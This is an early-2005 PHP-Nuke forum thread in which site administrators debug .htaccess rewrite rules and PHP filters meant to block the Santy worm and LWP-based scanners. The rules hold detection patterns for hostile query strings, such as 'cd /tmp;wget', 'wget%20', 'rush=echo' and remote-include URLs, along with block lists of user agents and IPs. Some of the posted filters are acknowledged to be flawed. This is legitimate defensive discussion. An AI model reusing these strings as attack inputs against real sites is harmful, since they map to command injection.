yaanno
New Member
Joined: Dec 29, 2004
Posts: 2
Posted: Wed Dec 29, 2004 4:40 am

Hia all,

Perhaps we could redirect all queries containin' the "http://" string in a way:

#variant-5 redirect all inner http:// request
RewriteCond %{QUERY_STRING} ^(.*)http://(.*) [NC,OR]
#variant-6 redirect all inner http request regardless if encoded
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*) [NC]

Sorry for my bad English, guys :)

yaanno
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 15210
Location: Kansas
Posted: Wed Dec 29, 2004 7:51 am

Your English is fine :) That would work too. And for those that can't use .htaccess, NukeSentinel filters for those anyway. Thanks for this contribution!
yaanno
New Member
Joined: Dec 29, 2004
Posts: 2
Posted: Wed Dec 29, 2004 8:05 am

Raven wrote:
Your English is fine :) That would work too. And for those that can't use .htaccess, NukeSentinel filters for those anyway. Thanks for this contribution!


Thanks Raven,

Unfortunately these solutions don't work without mod_rewrite. And the excellent Sentinel is for newer nuke systems only. So what about the older versions? Poor guys ;)

My journal currently runs under nuke 5.6 (oh my god! :) ) and was broken by this worm. So I did a hack in my mainfile.php in this way:

foreach ($HTTP_GET_VARS as $secvalue)
{
	// Crude script-tag filter: refuse any GET value that looks like <script ...>
	if (eregi("<[^>]*script*\"?[^>]*>", $secvalue))
	{
		die ("I don't like you...");
	}
	// Any GET value containing "http" is refused (the worm passes wget URLs this way)
	elseif (eregi("http", $secvalue))
	{
		die ("Don't bother me...");
	}
	// Note: "cd" matches anywhere in the value (so "abcd" is refused too), and
	// because it is tested first the more specific branch below is never reached
	elseif (eregi("cd", $secvalue))
	{
		die ("Go away...");
	}
	elseif (eregi("cd /tmp;wget", $secvalue))
	{
		die ("I call the FBI...");
	}
}

Cheers and happy Worm-ending Year,

yaanno
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 15210
Location: Kansas
Posted: Wed Dec 29, 2004 8:10 am

Correct again! As has been stated elsewhere, if you're with a host that uses Apache and not mod_rewrite - 86 the host and get another one.
cprompt
Regular
Joined: Jun 08, 2004
Posts: 64
Posted: Mon Jan 03, 2005 11:07 am

LWP::Simple and lwp-trivial are STILL getting through on my site.

My .htaccess, from the top:

Code:
RewriteEngine on
RewriteCond %{REQUEST_URI} ^visualcoders[NC,OR]
RewriteCond %{REQUEST_URI} ^envidiosos[NC,OR]
RewriteCond %{REQUEST_URI} ^civa[NC,OR]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org[NC,OR]
RewriteCond %{REQUEST_URI} ^lwp-trivial[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Bullseye.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailCollector.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Crescent.*Internet.*ToolPak.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^CherryPicker.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^fastlwspider/1.0.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SurfWalker.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWebPage.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP::Trivial [NC]
RewriteCond %{QUERY_STRING} rush=([^&]+)[NC]
#redirect all inner http:// request
RewriteCond %{QUERY_STRING} ^(.*)http://(.*) [NC,OR]
#redirect all inner http request regardless if encoded
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*) [NC]
RewriteRule ^.*$ noID.php [L]


The reason I have multiple entries for LWP Simple and Trivial is that I was trying ANYTHING!

I also placed this in my header.php file.

Code:
// strpos() returns 0 when the match is at the very start of the string and
// false when there is no match, so "> 0" misses a User-Agent that *begins*
// with LWP::Simple (which is exactly how the worm identifies itself).
// Comparing against false catches a match at any position.
if (strpos($HTTP_USER_AGENT, 'LWP::Simple') !== false) {
	exit;
}
if (strpos($HTTP_USER_AGENT, 'lwp-trivial') !== false) {
	exit;
}
if (strpos($HTTP_REFERER, 'myhost.gb.com') !== false) {
	exit;
}
if (strpos($HTTP_REFERER, 'mall.uk.net') !== false) {
	exit;
}
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 15210
Location: Kansas
Posted: Mon Jan 03, 2005 11:49 am

Replace ALL your lwp code with one line:

RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
cprompt
Regular
Joined: Jun 08, 2004
Posts: 64
Posted: Tue Jan 04, 2005 9:19 am

I made your advised change, Raven, and...
I'm STILL getting hit.
Got 10 more emails in my inbox this morning.
LWP::Simple

Quote:
Date & Time: 2005-01-04 07:43:10
Blocked IP: 69.61.61.146
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.803
Query String: [URL-encoded worm payload omitted]
Forwarded For: none
Client IP: none
Remote Address: 69.61.61.146
Remote Port: 43531
Request Method: GET
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 15210
Location: Kansas
Posted: Tue Jan 04, 2005 9:48 am

Post your .htaccess. I know this works. Something is wrong but it's not that code.
cprompt
Regular
Joined: Jun 08, 2004
Posts: 64
Posted: Tue Jan 04, 2005 9:52 am

Code:
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
RewriteCond %{REQUEST_URI} ^visualcoders [NC]
RewriteCond %{REQUEST_URI} ^envidiosos [NC]
RewriteCond %{REQUEST_URI} ^civa  [NC]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org  [NC]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$ <target URL hidden by the forum> [L]

PHP_FLAG output_buffering on

# (long list of "deny from <ip>" lines omitted)
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 15210
Location: Kansas
Posted: Tue Jan 04, 2005 9:59 am

You aren't using [NC,OR]. As a result, the rewrite engine treats those as AND. You had them originally. Put them back.
Code:
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
RewriteCond %{REQUEST_URI} ^envidiosos [NC,OR]
RewriteCond %{REQUEST_URI} ^civa  [NC,OR]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org  [NC,OR]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$ <target URL hidden by the forum> [L]
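As an added example (not Apache's code and not from any poster in this thread), a small Python model of how mod_rewrite evaluates a chain of RewriteCond lines. It shows the AND-versus-OR behaviour Raven describes above, why yaanno's two variants for "http://" and "http%3A%2F%2F" are both needed (the raw query string is tested, not a decoded one), and why flags glued to the pattern with no space, as in cprompt's first paste, silently stop matching. The request dictionary and every pattern not quoted from the thread are constructed for the example.

```python
import re

# Hypothetical minimal model of mod_rewrite's RewriteCond chaining (added
# example, not Apache's implementation).  It covers only what this thread
# uses: %{HTTP_USER_AGENT}, %{REQUEST_URI}, %{QUERY_STRING}, [NC] and [OR].
COND_RE = re.compile(r"^RewriteCond\s+%\{(\w+)\}\s+(\S+)(?:\s+\[([A-Z,]+)\])?\s*$")


def parse_cond(line):
    """Split one RewriteCond into (variable, pattern, set-of-flags)."""
    m = COND_RE.match(line)
    if not m:
        raise ValueError("not a RewriteCond line: %r" % line)
    flags = set(filter(None, (m.group(3) or "").split(",")))
    return m.group(1), m.group(2), flags


def rule_fires(cond_lines, request):
    """True if the RewriteRule guarded by cond_lines would run.

    Consecutive conditions are ANDed, except that a condition carrying
    [OR] is ORed with the one after it: a run of [OR] conditions ended
    by one without [OR] forms a single group, and the groups are ANDed.
    Dropping [OR] therefore requires *every* line to match, which is
    why a plain chain of [NC] conditions let LWP::Simple through."""
    groups, current = [], []
    for line in cond_lines:
        var, pattern, flags = parse_cond(line)
        value = request.get(var, "")          # raw, still percent-encoded
        matched = re.search(pattern, value, re.I if "NC" in flags else 0) is not None
        current.append(matched)
        if "OR" not in flags:                 # this line closes the OR group
            groups.append(any(current))
            current = []
    if current:                               # trailing [OR] still closes a group
        groups.append(any(current))
    return all(groups)


def lint_cond(line):
    """Report flags written with no whitespace before them, e.g.
    '^LWP[NC,OR]': they are not flags at all but a character class
    appended to the regex, so the condition can never match."""
    _, pattern, flags = parse_cond(line)
    if not flags and re.search(r"\[[A-Z,]+\]$", pattern):
        return "flags glued to pattern; put a space before '['"
    return None


# Constructed request, modelled on the blocked hit quoted above (no payload).
REQUEST = {
    "HTTP_USER_AGENT": "LWP::Simple/5.803",
    "REQUEST_URI": "/modules.php",
    "QUERY_STRING": "name=Search&rush=test&highlight=%2527",
}
```

Feeding a pasted .htaccess chain through rule_fires() and lint_cond() before deploying it catches both of the silent failures seen in this thread: a chain that needs every line to match, and a pattern that swallowed its own flags.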
cprompt
Regular
Joined: Jun 08, 2004
Posts: 64
Posted: Tue Jan 04, 2005 10:06 am

Thanks Raven, I'll give that a try. Thanks for your patience.
ring_c
Involved
Joined: Dec 28, 2003
Posts: 274
Location: Israel
Posted: Thu Mar 03, 2005 2:41 am

I've tried your code in the .htaccess file, but I still get emails such as this one:

Quote:
Date & Time: 2005-03-03 03:33:55
Blocked IP: 213.167.167.52
User ID: משתמש לא רשום (1)
Reason: Abuse-Harvest
String Match: lwp::simple
--------------------
User Agent: LWP::Simple/5.76
Query String:

Forwarded For: none
Client IP: none
Remote Address: 213.167.167.52
Remote Port: 15790
Request Method: GET


Here's my .htaccess. Could you tell me what's wrong:

Code:
# $Author: zx $
# $Date: 2003/08/17 14:03:21 $

#Check for Santy Worms and redirect them to a phantom site
#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP                     [NC,OR]
#Variant-2
RewriteCond %{REQUEST_URI} ^visualcoders                [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+)                [NC,OR]
#Variant-4
#RewriteCond %{QUERY_STRING} ^(.*)wget(.*)               [NC]
RewriteRule ^.*$ http://www.goawayanddontcomeback.com   [L]

# deny most common except .php
<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$">
</FilesMatch>

<Limit GET PUT POST>
  Order Allow,Deny
  deny from 200.
  Allow from all
</Limit>


<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 81.10.16
deny from 212.98.150
deny from 192.118.48.248
64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1140
Location: Manchester, NH USA
Posted: Thu Mar 03, 2005 7:50 am

Try this instead:

Find:
Code:
#Check for Santy Worms and redirect them to a phantom site
#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP                     [NC,OR]
#Variant-2
RewriteCond %{REQUEST_URI} ^visualcoders                [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+)                [NC,OR]
#Variant-4
#RewriteCond %{QUERY_STRING} ^(.*)wget(.*)               [NC]


And replace with:
Code:
RewriteCond %{QUERY_STRING} ^(.*)configdir(.*)          [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20


That pretty much covers mine.
ring_c
Involved
Joined: Dec 28, 2003
Posts: 274
Location: Israel
Posted: Thu Mar 03, 2005 4:34 pm

Thanks a lot. Updated.
Now we'll see if more emails are coming in...

thanks again!
ring_c
Involved
Joined: Dec 28, 2003
Posts: 274
Location: Israel
Posted: Fri Mar 04, 2005 2:26 am

Yet, no go! :(

Here's one of three emails I got today:

Code:
Date & Time: 2005-03-03 17:56:03
Blocked IP: 213.196.37.240
User ID: משתמש לא רשום (1)
Reason: Abuse-Harvest
String Match: lwp::simple
--------------------
User Agent: LWP::Simple/5.36
Query String:

Forwarded For: none
Client IP: none
Remote Address: 213.196.37.240
Remote Port: 2720
Request Method: GET


HELP!!!!!!!!!!!!
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 15210
Location: Kansas
Posted: Fri Mar 04, 2005 2:37 am

ring_c, do you have this line in your .htaccess?

RewriteEngine on
ring_c
Involved
Joined: Dec 28, 2003
Posts: 274
Location: Israel
Posted: Fri Mar 04, 2005 2:43 am

Raven wrote:
ring_c, do you have this line in your .htaccess?

RewriteEngine on


Nope...

Here's my current .htaccess:

Code:
# $Author: zx $
# $Date: 2003/08/17 14:03:21 $

RewriteCond %{QUERY_STRING} ^(.*)configdir(.*)          [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://www.goawayanddontcomeback.com   [L]

# deny most common except .php
<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$">
</FilesMatch>

<Limit GET PUT POST>
  Order Allow,Deny
  deny from 200.
  Allow from all
</Limit>


<Files 403.shtml>
order allow,deny
allow from all
</Files>


Anything??? :(
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 15210
Location: Kansas
Posted: Fri Mar 04, 2005 3:36 am

ROTFL. Without that line, mod_rewrite isn't turned on. Therefore, it won't work. Look at the examples above to see how it's supposed to be ;)
ring_c
Involved
Joined: Dec 28, 2003
Posts: 274
Location: Israel
Posted: Fri Mar 04, 2005 4:15 am

Quote:
Without that line, mod_rewrite isn't turned on. Therefore, it won't work. Look at the examples above to see how it's supposed to be

Oops... how have I missed that?!

Just a sec.... is mod_rewrite a module I need to install with my phpnuke or something?
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 15210
Location: Kansas
Posted: Fri Mar 04, 2005 4:23 am

mod_rewrite is an Apache module. Run phpinfo() to see if it is installed.
VinDSL
Life Cycles Becoming CPU Cycles
Joined: Jul 11, 2004
Posts: 616
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com
Posted: Fri Mar 04, 2005 5:05 am

Raven wrote:
ROTFL. Without that line, mod_rewrite isn't turned on. Therefore, it won't work. Look at the examples above to see how it's supposed to be

True! Generally speaking, rewrite configurations are not inherited, even though the conditions, rules, et cetera are. So, I always add this line (once) at the top of all my .htaccess file[s] just to play it safe... ;)
ring_c
Involved
Joined: Dec 28, 2003
Posts: 274
Location: Israel
Posted: Fri Mar 04, 2005 6:20 am

Quote:
mod_rewrite is an Apache module. Run phpinfo() to see if it is installed.

I don't have access to the shell (command prompt). :(
Is there any other way to tell?
ring_c
Involved
Joined: Dec 28, 2003
Posts: 274
Location: Israel
Posted: Fri Mar 04, 2005 6:25 am

Oh, I've found my host company provides a link to run phpinfo(). I've searched for "rewrite" and only found this:

Under Configuration/Standard there's a table. The relevant line says:
Directive: url_rewriter.tags
Local Value: a=href,area=href,frame=src,form=,fieldset=
Master Value: a=href,area=href,frame=src,form=,fieldset=

Is that ok?
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 15210
Location: Kansas
Posted: Fri Mar 04, 2005 7:34 am

You don't need a shell anyway. Just save this script to a file and run it:
Code:
<?php
// Dumps the PHP and Apache configuration, including the loaded Apache modules
phpinfo();
?>

Scroll down to the "Apache: Loaded Modules" section and see if mod_rewrite is listed:
Code:
mod_auth_passthrough, mod_log_bytes, mod_bwlimited, mod_php4, mod_frontpage, mod_ssl, mod_setenvif, mod_so, mod_auth, mod_access, MOD_REWRITE, mod_alias, mod_userdir, mod_actions, mod_imap, mod_asis, mod_cgi, mod_dir, mod_autoindex, mod_include, mod_status, mod_negotiation, mod_mime, mod_log_config, mod_env, http_core